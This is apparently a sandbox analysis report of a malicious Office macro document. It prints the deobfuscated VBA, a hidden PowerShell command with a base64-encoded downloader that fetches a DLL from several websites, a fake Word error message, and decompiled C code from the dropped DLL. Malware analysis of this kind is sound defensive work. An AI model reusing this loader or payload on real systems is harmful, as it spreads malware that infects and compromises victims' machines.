nw[3oAC]anw[3gAJ]anw[3wBT]anw[3AGk]anw[3AbA]anw[3BlA]anw[3G4A]anw[3dAA]anw[3nAC]anw[3sAJ]anw[3wBs]anw[3AHk]anw[3AJw]anw[3ApA]anw[3CsA]anw[3JwB]anw[3DAC]anw[3cAK]anw[3wAo]anw[3ACc]anw[3Abw]anw[3BuA]anw[3CcA]anw[3KwA]anw[3nAH]anw[3QAa]anw[3QAn]anw[3ACk]anw[3AKw]anw[3AnA]anw[3G4A]anw[3JwA]anw[3rAC]anw[3cAd]anw[3QBl]anw[3ACc]anw[3AKQ]anw[3A7A]anw[3CQA]anw[3TwB]anw[3sAD]anw[3kAb]anw[3wBu]anw[3AGs]anw[3AaQ]anw[3A9A]anw[3CQA]anw[3QwA]anw[3wAD]anw[3IAV]anw[3wAg]anw[3ACs]anw[3AIA]anw[3BbA]anw[3GMA]anw[3aAB]anw[3hAH]anw[3IAX]anw[3QAo]anw[3ADY]anw[3ANA]anw[3ApA]anw[3CAA]anw[3KwA]anw[3gAC]anw[3QAQ]anw[3QAw]anw[3ADM]anw[3AUA]anw[3A7A]anw[3CQA]anw[3SAA]anw[3yAD]anw[3cAW]anw[3AA9]anw[3ACg]anw[3AJw]anw[3BJA]anw[3CcA]anw[3KwA]anw[3oAC]anw[3cAN]anw[3gAn]anw[3ACs]anw[3AJw]anw[3A3A]anw[3FEA]anw[3JwA]anw[3pAC]anw[3kAO]anw[3wAg]anw[3ACA]anw[3AKA]anw[3BnA]anw[3GkA]anw[3IAA]anw[3oAC]anw[3IAV]anw[3gBh]anw[3AFI]anw[3AIg]anw[3ArA]anw[3CIA]anw[3aQB]anw[3BAE]anw[3IAT]anw[3ABl]anw[3ADo]anw[3Aaw]anw[3AiA]anw[3CsA]anw[3IgA]anw[30AD]anw[3cAZ]anw[3AAi]anw[3ACk]anw[3AIA]anw[3AgA]anw[3CkA]anw[3LgB]anw[32AG]anw[3EAT]anw[3AB1]anw[3AGU]anw[3AOg]anw[3A6A]anw[3CIA]anw[3QwB]anw[3yAE]anw[3UAY]anw[3ABB]anw[3AGA]anw[3AVA]anw[3BgA]anw[3EUA]anw[3RAB]anw[3JAF]anw[3IAZ]anw[3QBD]anw[3AFQ]anw[3AYA]anw[3BPA]anw[3FIA]anw[3eQA]anw[3iAC]anw[3gAJ]anw[3ABI]anw[3AE8]anw[3ATQ]anw[3BFA]anw[3CAA]anw[3KwA]anw[3gAC],"]anw[3",) -> cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD IABzAFYAIAAgACgAIgBLACIAKwAiADQANwBkACIAKQAgACAAKABbAHQAWQBQAGUAXQAoACIAewA0AH0AewAxAH0AewAwAH0AewAzAH0AewAyAH0AIgAtAEYAJwBzACcALAAnAHkAJwAsACcAZQBjAFQAbwByAFkAJwAsACcAVABFAG0ALgBJAG8ALgBEAEkAcgAnACwAJwBzACcAKQApACAAIAA7ACAAIAAgACAAJABXAGkAOAAgAD0AWwB0AHkAUABlAF0AKAAiAHsAMgB9AHsAMwB9AHsANwB9AHsAMQB9AHsANAB9AHsANgB9AHsANQB9AHsAOAB9AHsAMAB9ACIALQBGACAAJwBnAEUAUgAnACwAJwAuAE4AZQB0AC4AUwBFAFIAVgAnACwAJwBTAFkAcwAnACwAJwBUAGUAJwAsACcASQAnACwAJwB0AG0AQQAnACwAJwBDAGUAUABPAEkATgAnACwAJwBtACcALAAnAE4AYQAnACkAIAA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTAGkAbABlAG4AdAAnACsAJwBsAHkAJwApACsAJwBDACcAKwAoACcAbwBuACcAKwAnAHQAaQAnACkAKwAnAG4AJwArACcAdQBlACcAKQA7ACQATwBsADkAbwBuAGsAaQA9ACQAQwAwADIAVwAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAQQAwADMAUAA7ACQASAAyADcAWAA9ACgAJwBJACcAKwAoACcANgAnACsAJwA3AFEAJwApACkAOwAgACAAKABnAGkAIAAoACIAVgBhAFIAIgArACIAaQBBAEIATABlADoAawAiACsAIgA0ADcAZAAiACkAIAAgACkALgB2AGEATAB1AGUAOgA6ACIAQwByAEUAYABBAGAAVABgAEUARABJAFIAZQBDAFQAYABPAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAJwArACcAMAAnACsAJwB9AE4AcwAnACsAJwBwACcAKwAnAHoAdgBzAGcAewAnACsAJwAwAH0AJwArACcAUwBqAF8AZAB3AGcAcwB7ACcAKwAnADAAfQAnACkAIAAgAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAFQANAA4AEsAPQAoACcASAAnACsAKAAnADYAMQAnACsAJwBEACcAKQApADsAIAAgACQAVwBpADgAOgA6ACIAcwBlAGMAdQBSAGkAdABgAHkAcAByAE8AYABUAGAAbwBjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAQwA1ADkATQA9ACgAKAAnAE0AJwArACcAMgA0ACcAKQArACcAUAAnACkAOwAkAFgAbQBtAGgAawBlAGQAIAA9ACAAKAAoACcAUgAnACsAJwAzADEAJwApACsAJwBOACcAKQA7ACQAQQA2ADkASQA9ACgAKAAnAFAAXwAnACsAJwA2ACcAKQArACcAQgAnACkAOwAkAFEAMgB5AGcAOQBnAF8APQAkAEgATwBNAEUAKwAoACgAKAAnADEAJwArACcAdwByACcAKQArACgAJwBOAHMAJwArACcAcAB6ACcAKQArACgAJwB2ACcAKwAnAHMAZwAnACkAKwAnADEAdwAnACsAKAAnAHIAUwAnACsAJwBqAF8AJwArACcAZAB3ACcAKwAnAGcAcwAxAHcAcgAnACkAKQAuACIAcgBFAHAAYABsAEEAYwBlACIAKAAoAFsAQwBoAGEAcgBdADQAOQArAFsAQwBoAGEAcgBdADEAMQA5ACsAWwBDAGgAYQByAF0AMQAxADQAKQAsACcAXAAnACkAKQArACQAWABtAG0AaABrAGUAZAArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFUAMwA5AFIAPQAoACcATQAwACcAKwAnADEAUAAnACkAOwAkAFEAYwBlAGMAaAA0AGgAPQAoACcAXQBhACcAKwAoACcAbgAnACsAJwB3AFsAMwA6AC8ALwAnACkAKwAoACcAdwAnACsAJwBwAHMAJwApACsAJwBhACcAKwAnAHAAawAnACsAKAAnAC4AYwBvACcAKwAnAG0ALwB3AHAALQAnACsAJwBhAGQAJwArACcAbQBpACcAKQArACgAJwBuAC8AdgAnACsAJwAvAEAAJwApACsAJwBdACcAKwAoACcAYQBuAHcAJwArACcAWwAzACcAKwAnADoALwAvAHMAJwApACsAKAAnAG8AZgBzAHUAJwArACcAaQAnACkAKwAnAHQAZQAnACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAvACcAKwAnAHcAcAAnACsAKAAnAC0AaQAnACsAJwBuAGMAJwApACsAKAAnAGwAdQBkACcAKwAnAGUAJwApACsAJwBzAC8AJwArACgAJwAyAGoAbQAzAG4AJwArACcASQBrAC8AJwArACcAQAAnACkAKwAoACcAXQBhACcAKwAnAG4AdwBbACcAKQArACcAMwAnACsAKAAnADoALwAvAHYAZQB0AGUAcgAnACsAJwBpAG4AYQByAGkAYQAnACsAJwBkACcAKQArACgAJwByAHAAJwArACcAbwBwACcAKQArACgAJwB1AGkALgBjAG8AJwArACcAbQAnACkAKwAoACcALwAnACsAJwBjAG8AJwApACsAJwBuACcAKwAnAHQAZQAnACsAKAAnAG4AdAAnACsAJwAvADUAZgAnACkAKwAnADEAJwArACcAOABRACcAKwAnAC8AJwArACcAQAAnACsAKAAnAF0AYQAnACsAJwBuACcAKQArACcAdwAnACsAKAAnAFsAMwA6ACcAKwAnAC8ALwBzAGgAJwArACcAbwBwACcAKwAnAC4AJwApACsAJwBlAGwAJwArACcAZQAnACsAKAAnAG0AZQBuACcAKwAnAHMAbAAnACsAJwBpACcAKQArACgAJwBkACcAKwAnAGUALgAnACkAKwAoACcAYwBvAG0AJwArACcALwAnACkAKwAnAHcAcAAnACsAJwAtAGMAJwArACcAbwAnACsAKAAnAG4AJwArACcAdABlAG4AdAAnACkAKwAoACcALwAnACsAJwBuAC8AJwArACcAQABdAGEAbgAnACkAKwAoACcAdwBbADMAJwArACcAOgAvAC8AJwApACsAJwBrACcAKwAoACcAaAAnACsAJwBhAG4AJwApACsAKAAnAGgAJwArACcAaABvACcAKQArACgAJwBhAGgAbwAnACsAJwBtACcAKQArACgAJwBuAGEAeQAuAG4AZQAnACsAJwB0AC8AJwArACcAdwBvAHIAZABwACcAKQArACgAJwByAGUAJwArACcAcwAnACkAKwAoACcAcwAvACcAKwAnAEMAJwApACsAKAAnAEcATQBDAC8AQAAnACsAJwBdACcAKQArACcAYQBuACcAKwAnAHcAJwArACgAJwBbADMAOgAvACcAKwAnAC8AJwApACsAKAAnAGMAYQAnACsAJwBtACcAKQArACgAJwBwAHUAJwArACcAcwBlACcAKwAnAHgAcABvACcAKwAnAC4AbwByAGcALwBkAGUAJwApACsAJwBwACcAKwAoACcAYQByACcAKwAnAHQAbQBlAG4AJwApACsAJwB0ACcAKwAoACcALQAnACsAJwBvAGYALQBvAGQAaABtACcAKQArACgAJwBtAGsAZAAvADkANQBlAFgAJwArACcAWgAnACsAJwBZACcAKQArACgAJwAvAEAAXQBhAG4AdwBbACcAKwAnADMAcwA6AC8ALwBnACcAKwAnAHUAcgAn

                                                    Ij2hesgjee57d3s0

                                                    uVItICICB

                                                    CreateObject

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: SQQWY

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: ddanFDWJf

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: RhztCF

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: kwzjKvZHe

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: inIcjJtaF

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: zBSWCKmJv

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: KXTliE

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: YZllAeRe

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: hjZwD

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: FUyIHBDFz

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AiRdGDAJ

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AioOpBFE

                                                    CreateTextFile

                                                    WriteLine

                                                    WriteLine

                                                    WriteLine

                                                    anyPG

                                                    Close

                                                    YVZXECEHD

                                                    StringsDecrypted Strings
                                                    "]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"
                                                    "NFKiIDO:\sBRpIz\FFqJD.QevLKGfGs"
                                                    "CcDmClHsnCC"
                                                    "aqGiHISIbAoabV"
                                                    "nJJzFRjEWpRikxCD"
                                                    "]a""nw[3"
                                                    "]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"
                                                    "QWqEKJnW:\BQVnVKF\gWdSBXA.TabDJBD"
                                                    "syYTHJShrguhzb"
                                                    "TubioGUTLadgXbA"
                                                    "oLweAMoGsqVE"
                                                    LineInstructionMeta Information
                                                    263

                                                    Function Hrs2a1p95u19(Svk60sycz63sk)

                                                    264

                                                    Q491417n8n1 = Pg5minli2d3c9

                                                    Pg5minli2d3c9

                                                    executed
                                                    265

                                                    Goto uWZkeMFv

                                                    266

                                                    Dim zDsRaIBGF as Object

                                                    267

                                                    Set ViWsSIH = sreXHFD

                                                    sreXHFD

                                                    268

                                                    Set zDsRaIBGF = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))

                                                    CreateObject

                                                    269

                                                    Dim uWZkeMFv as Object

                                                    270

                                                    Set uWZkeMFv = zDsRaIBGF.CreateTextFile("NFKiIDO:\sBRpIz\FFqJD.QevLKGfGs")

                                                    CreateTextFile

                                                    271

                                                    uWZkeMFv.WriteLine "CcDmClHsnCC"

                                                    WriteLine

                                                    272

                                                    uWZkeMFv.WriteLine "aqGiHISIbAoabV"

                                                    WriteLine

                                                    273

                                                    uWZkeMFv.WriteLine "nJJzFRjEWpRikxCD"

                                                    WriteLine

                                                    274

                                                    Set QOrvJEB = eCIzUDyJ

                                                    eCIzUDyJ

                                                    275

                                                    uWZkeMFv.Close

                                                    Close

                                                    276

                                                    Set zDsRaIBGF = Nothing

                                                    277

                                                    Set UskmBJF = yJmmmVIAG

                                                    yJmmmVIAG

                                                    278

                                                    Set uWZkeMFv = Nothing

                                                    278

                                                    uWZkeMFv:

                                                    280

                                                    Hrs2a1p95u19 = Replace(Svk60sycz63sk, "]a" + "nw[3", Ij2hesgjee57d3s0)

                                                    Replace("w]anw[3in]anw[3m]anw[3gm]anw[3t]anw[3]anw[3]anw[3]anw[3s]anw[3]anw[3]anw[3:w]anw[3]anw[3in]anw[33]anw[32]anw[3_]anw[3]anw[3p]anw[3]anw[3ro]anw[3]anw[3ce]anw[3s]anw[3s]anw[3]anw[3","]anw[3",) -> winmgmts:win32_process

                                                    Ij2hesgjee57d3s0

                                                    executed
                                                    281

                                                    Goto iHKuDmaEr

                                                    282

                                                    Dim OMZxxg as Object

                                                    283

                                                    Set drZcHkCm = uVItICICB

                                                    uVItICICB

                                                    284

                                                    Set OMZxxg = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))

                                                    CreateObject

                                                    285

                                                    Dim iHKuDmaEr as Object

                                                    286

                                                    Set iHKuDmaEr = OMZxxg.CreateTextFile("QWqEKJnW:\BQVnVKF\gWdSBXA.TabDJBD")

                                                    CreateTextFile

                                                    287

                                                    iHKuDmaEr.WriteLine "syYTHJShrguhzb"

                                                    WriteLine

                                                    288

                                                    iHKuDmaEr.WriteLine "TubioGUTLadgXbA"

                                                    WriteLine

                                                    289

                                                    iHKuDmaEr.WriteLine "oLweAMoGsqVE"

                                                    WriteLine

                                                    290

                                                    Set noebIvSiu = anyPG

                                                    anyPG

                                                    291

                                                    iHKuDmaEr.Close

                                                    Close

                                                    292

                                                    Set OMZxxg = Nothing

                                                    293

                                                    Set NXbmIuHX = YVZXECEHD

                                                    YVZXECEHD

                                                    294

                                                    Set iHKuDmaEr = Nothing

                                                    294

                                                    iHKuDmaEr:

                                                    296

                                                    End Function

                                                    Module: Zdjtk46nm17voo

                                                    Declaration
                                                    LineContent
                                                    1

                                                    Attribute VB_Name = "Zdjtk46nm17voo"

                                                    Reset < >

                                                      Analysis Process: powershell.exe PID: 2556 Parent PID: 684 powershell.exeCOMMON

                                                      Executed Functions

                                                      Function 000007FF00282139, Relevance: .5, Instructions: 536COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.2120559921.000007FF00280000.00000040.00000001.sdmp, Offset: 000007FF00280000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4fc53985985eeb755ffc9d794dbbeb122f11c294abc64cfd42042ab2a948ee65
                                                      • Instruction ID: e08fe96bc2c812efc419e6c2571681448125df03d4b39c5d561ef8e614d9dd0b
                                                      • Opcode Fuzzy Hash: 4fc53985985eeb755ffc9d794dbbeb122f11c294abc64cfd42042ab2a948ee65
                                                      • Instruction Fuzzy Hash: 65D17C2194EBC64FE7539B785C65AA07FB0EF17210B0A01EBD489CF0B3D9589D59C362
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 000007FF002808C0, Relevance: .2, Instructions: 181COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.2120559921.000007FF00280000.00000040.00000001.sdmp, Offset: 000007FF00280000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7bb74d4d20f76da61dabee85c98d557bd22a156e7ee8445ca3fdfe42a3e295ab
                                                      • Instruction ID: e2502e31b877567a997b10ea253280d3b8a54540c54952d146768ad14bfe1cae
                                                      • Opcode Fuzzy Hash: 7bb74d4d20f76da61dabee85c98d557bd22a156e7ee8445ca3fdfe42a3e295ab
                                                      • Instruction Fuzzy Hash: 4441AD6094EBC29FE74787385C656A07FB0AF47210B0E05E7D484CF0B3D9199E9AC762
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 000007FF002823C5, Relevance: .1, Instructions: 141COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.2120559921.000007FF00280000.00000040.00000001.sdmp, Offset: 000007FF00280000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9d7878aa897ef53f29e10fb59683db920bd84a6d249679c74071f5418a8c2d95
                                                      • Instruction ID: d02e5de5812916d9d4c1ba208fc52d048925450eec31c4bdd5aee0d13a503c1e
                                                      • Opcode Fuzzy Hash: 9d7878aa897ef53f29e10fb59683db920bd84a6d249679c74071f5418a8c2d95
                                                      • Instruction Fuzzy Hash: E631C021A1EBC64FE79757785C65BB03FE0EF17210B4A00E7D448CB1A3D9089D99C3A2
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Non-executed Functions

                                                      Analysis Process: rundll32.exe PID: 2824 Parent PID: 2332 rundll32.exeCOMMON

                                                      Executed Functions

                                                      Function 00232C63, Relevance: 54.9, Strings: 43, Instructions: 1125COMMONCrypto
                                                      Download Yara Rule
                                                      C-Code - Quality: 97%
                                                      			E00232C63() {
				char _v68;
				signed int _v72;
				char _v80;
				char _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				void* _v112;
				signed int _v116;
				char _v124;
				char _v132;
				char _v140;
				char _v144;
				signed int _v148;
				void* _v152;
				void* _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				unsigned int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				unsigned int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				unsigned int _v272;
				signed int _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				signed int _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				signed int _v308;
				signed int _v312;
				signed int _v316;
				signed int _v320;
				signed int _v324;
				signed int _v328;
				signed int _v332;
				signed int _v336;
				signed int _v340;
				unsigned int _v344;
				signed int _v348;
				signed int _v352;
				signed int _v356;
				signed int _v360;
				signed int _v364;
				signed int _v368;
				signed int _v372;
				signed int _v376;
				signed int _v380;
				signed int _v384;
				signed int _v388;
				signed int _v392;
				unsigned int _v396;
				signed int _v400;
				signed int _v404;
				signed int _v408;
				signed int _v412;
				signed int _v416;
				signed int _v420;
				signed int _v424;
				signed int _v428;
				signed int _v432;
				signed int _v436;
				signed int _v440;
				signed int _v444;
				signed int _v448;
				signed int _v452;
				signed int _v456;
				signed int _v460;
				signed int _v464;
				signed int _v468;
				signed int _v472;
				signed int _v476;
				signed int _v480;
				signed int _v484;
				signed int _v488;
				signed int _v492;
				signed int _v496;
				signed int _v500;
				signed int _v504;
				signed int _v508;
				signed int _v512;
				unsigned int _v516;
				signed int _v520;
				signed int _v524;
				signed int _v528;
				signed int _v532;
				signed int _v536;
				signed int _v540;
				unsigned int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				unsigned int _v576;
				signed int _v580;
				signed int _v584;
				unsigned int _v588;
				signed int _v592;
				unsigned int _v596;
				signed int _v600;
				signed int _t1135;
				signed int _t1138;
				signed int _t1140;
				signed int _t1144;
				signed int _t1172;
				void* _t1186;
				signed int _t1199;
				void* _t1213;
				signed int _t1218;
				signed int _t1224;
				signed int _t1257;
				signed int _t1336;
				signed int _t1340;
				signed int _t1348;
				signed int _t1351;
				signed int _t1352;
				signed int _t1353;
				signed int _t1354;
				signed int _t1355;
				signed int _t1356;
				signed int _t1357;
				signed int _t1358;
				signed int _t1359;
				signed int _t1360;
				signed int _t1361;
				signed int _t1362;
				signed int _t1363;
				signed int _t1364;
				signed int _t1365;
				signed int _t1366;
				signed int _t1367;
				signed int _t1368;
				signed int _t1369;
				signed int _t1370;
				signed int _t1371;
				signed int _t1372;
				void* _t1384;
				signed int _t1385;
				void* _t1387;
				void* _t1389;
				void* _t1391;
				void* _t1392;
				void* _t1393;

				_t1387 = (_t1385 & 0xfffffff8) - 0x258;
				_v596 = 0x54d1;
				_t1225 = 0x2a32d0a;
				_t1351 = 0x66;
				_v596 = _v596 / _t1351;
				_t1352 = 0x6b;
				_v596 = _v596 / _t1352;
				_v596 = _v596 >> 4;
				_v596 = _v596 ^ 0x00002830;
				_v416 = 0xcdcb;
				_v416 = _v416 + 0x2116;
				_t1353 = 0x1f;
				_v416 = _v416 * 0x30;
				_v416 = _v416 ^ 0x002c9323;
				_v488 = 0x9982;
				_v488 = _v488 | 0x10c88477;
				_v488 = _v488 ^ 0xa41c88c2;
				_v488 = _v488 / _t1353;
				_v488 = _v488 ^ 0x05d51165;
				_v496 = 0x77c8;
				_v496 = _v496 >> 3;
				_t1354 = 0xa;
				_v496 = _v496 / _t1354;
				_v496 = _v496 << 7;
				_v496 = _v496 ^ 0x0000cb31;
				_v232 = 0x48c9;
				_v232 = _v232 << 0xe;
				_v232 = _v232 ^ 0x12321472;
				_v360 = 0x3c3d;
				_t1218 = 5;
				_v360 = _v360 / _t1218;
				_v360 = _v360 * 0x2f;
				_v360 = _v360 ^ 0x000268e3;
				_v176 = 0x1856;
				_v176 = _v176 * 0x70;
				_v176 = _v176 ^ 0x000ab2a8;
				_v264 = 0xa86e;
				_v264 = _v264 + 0xffff13b3;
				_v264 = _v264 ^ 0xffffefbf;
				_v376 = 0x5423;
				_v376 = _v376 + 0xffffd432;
				_v376 = _v376 | 0x32249576;
				_v376 = _v376 ^ 0x3224c778;
				_v248 = 0xe66f;
				_v248 = _v248 >> 9;
				_v248 = _v248 ^ 0x000023ba;
				_v308 = 0x205b;
				_v308 = _v308 + 0xffff1f5e;
				_v308 = _v308 << 8;
				_v308 = _v308 ^ 0xff3fb884;
				_v484 = 0x592;
				_v484 = _v484 + 0xffffd519;
				_v484 = _v484 | 0x759ff25f;
				_v484 = _v484 + 0x87eb;
				_v484 = _v484 ^ 0x00008574;
				_v168 = 0x6ddb;
				_v168 = _v168 | 0x6e943d07;
				_v168 = _v168 ^ 0x6e944d9a;
				_v200 = 0xd6b0;
				_v200 = _v200 + 0xffff46fa;
				_v200 = _v200 ^ 0x00002650;
				_v452 = 0x246b;
				_v452 = _v452 ^ 0x586b7630;
				_v452 = _v452 << 0xc;
				_v452 = _v452 + 0xd57e;
				_v452 = _v452 ^ 0xb526cd97;
				_v348 = 0xfa69;
				_t1340 = 0x52;
				_t1355 = 0x65;
				_v348 = _v348 * 0x65;
				_v348 = _v348 | 0xab757825;
				_v348 = _v348 ^ 0xab77a96f;
				_v324 = 0xa741;
				_v324 = _v324 ^ 0x4f747397;
				_v324 = _v324 / _t1340;
				_v324 = _v324 ^ 0x00f83cd8;
				_v296 = 0x788d;
				_v296 = _v296 ^ 0x0ef2968d;
				_v296 = _v296 ^ 0x495ddb9a;
				_v296 = _v296 ^ 0x47af2616;
				_v220 = 0xb89f;
				_v220 = _v220 >> 0xb;
				_v220 = _v220 ^ 0x000056af;
				_v520 = 0x12ce;
				_v520 = _v520 + 0xe747;
				_v520 = _v520 << 7;
				_v520 = _v520 | 0x5b07959e;
				_v520 = _v520 ^ 0x5b7fa869;
				_v208 = 0xa95c;
				_v208 = _v208 + 0xffff5ee2;
				_v208 = _v208 ^ 0x00000a9e;
				_v172 = 0xa2eb;
				_v172 = _v172 * 0x79;
				_v172 = _v172 ^ 0x004d63d4;
				_v180 = 0x98a7;
				_v180 = _v180 | 0x8ae8094c;
				_v180 = _v180 ^ 0x8ae8e600;
				_v424 = 0xd5a0;
				_v424 = _v424 << 5;
				_v424 = _v424 / _t1355;
				_v424 = _v424 ^ 0x00007145;
				_v392 = 0x548d;
				_v392 = _v392 + 0xffff9ec2;
				_v392 = _v392 + 0xffffa1fb;
				_v392 = _v392 ^ 0xffff9dba;
				_v340 = 0x6e45;
				_t1356 = 0x16;
				_v340 = _v340 / _t1356;
				_v340 = _v340 + 0xffff4bce;
				_v340 = _v340 ^ 0xffff3c02;
				_v536 = 0xbde4;
				_v536 = _v536 * 0x7f;
				_v536 = _v536 ^ 0x574a5eba;
				_v536 = _v536 << 0xd;
				_v536 = _v536 ^ 0x8d54c30e;
				_v284 = 0x7ef6;
				_v284 = _v284 + 0x9ef0;
				_v284 = _v284 ^ 0x00015c31;
				_v408 = 0xc211;
				_v408 = _v408 ^ 0x3543d7c0;
				_v408 = _v408 * 0x2b;
				_v408 = _v408 ^ 0xf244fbb0;
				_v588 = 0x856b;
				_v588 = _v588 ^ 0xfc1cd259;
				_v588 = _v588 ^ 0x7d294751;
				_v588 = _v588 >> 0xe;
				_v588 = _v588 ^ 0x000240de;
				_v508 = 0x646a;
				_t1357 = 0x1e;
				_v508 = _v508 / _t1357;
				_t1358 = 0x35;
				_v508 = _v508 / _t1358;
				_v508 = _v508 * 0x5a;
				_v508 = _v508 ^ 0x00003cc0;
				_v472 = 0x196b;
				_v472 = _v472 * 0x16;
				_v472 = _v472 + 0x8cdc;
				_v472 = _v472 ^ 0x6344539c;
				_v472 = _v472 ^ 0x6346dd33;
				_v212 = 0xb705;
				_v212 = _v212 << 7;
				_v212 = _v212 ^ 0x005bff43;
				_v312 = 0xb48f;
				_v312 = _v312 + 0xffff701f;
				_v312 = _v312 >> 0xa;
				_v312 = _v312 ^ 0x00001302;
				_v480 = 0xed6e;
				_v480 = _v480 | 0x6be3eced;
				_v480 = _v480 + 0x4979;
				_v480 = _v480 ^ 0x6be47f6f;
				_v204 = 0xd35b;
				_v204 = _v204 >> 8;
				_v204 = _v204 ^ 0x00000622;
				_v456 = 0xd2fa;
				_v456 = _v456 << 3;
				_v456 = _v456 + 0xffffd4b1;
				_v456 = _v456 << 4;
				_v456 = _v456 ^ 0x0066f5d7;
				_v464 = 0x5ee1;
				_v464 = _v464 >> 9;
				_v464 = _v464 | 0xf1defbea;
				_v464 = _v464 ^ 0xf1de88d3;
				_v304 = 0x5962;
				_v304 = _v304 ^ 0xf5db8de9;
				_v304 = _v304 | 0xcdcbde78;
				_v304 = _v304 ^ 0xfddba732;
				_v196 = 0xf258;
				_v196 = _v196 << 7;
				_v196 = _v196 ^ 0x007971a7;
				_v448 = 0xfcbd;
				_v448 = _v448 | 0x39b7afc5;
				_v448 = _v448 * 0x70;
				_v448 = _v448 | 0x0e40c0bc;
				_v448 = _v448 ^ 0x4e7fac25;
				_v412 = 0x82bf;
				_v412 = _v412 | 0xb02f6e2d;
				_v412 = _v412 + 0xffff8626;
				_v412 = _v412 ^ 0xb02f1cac;
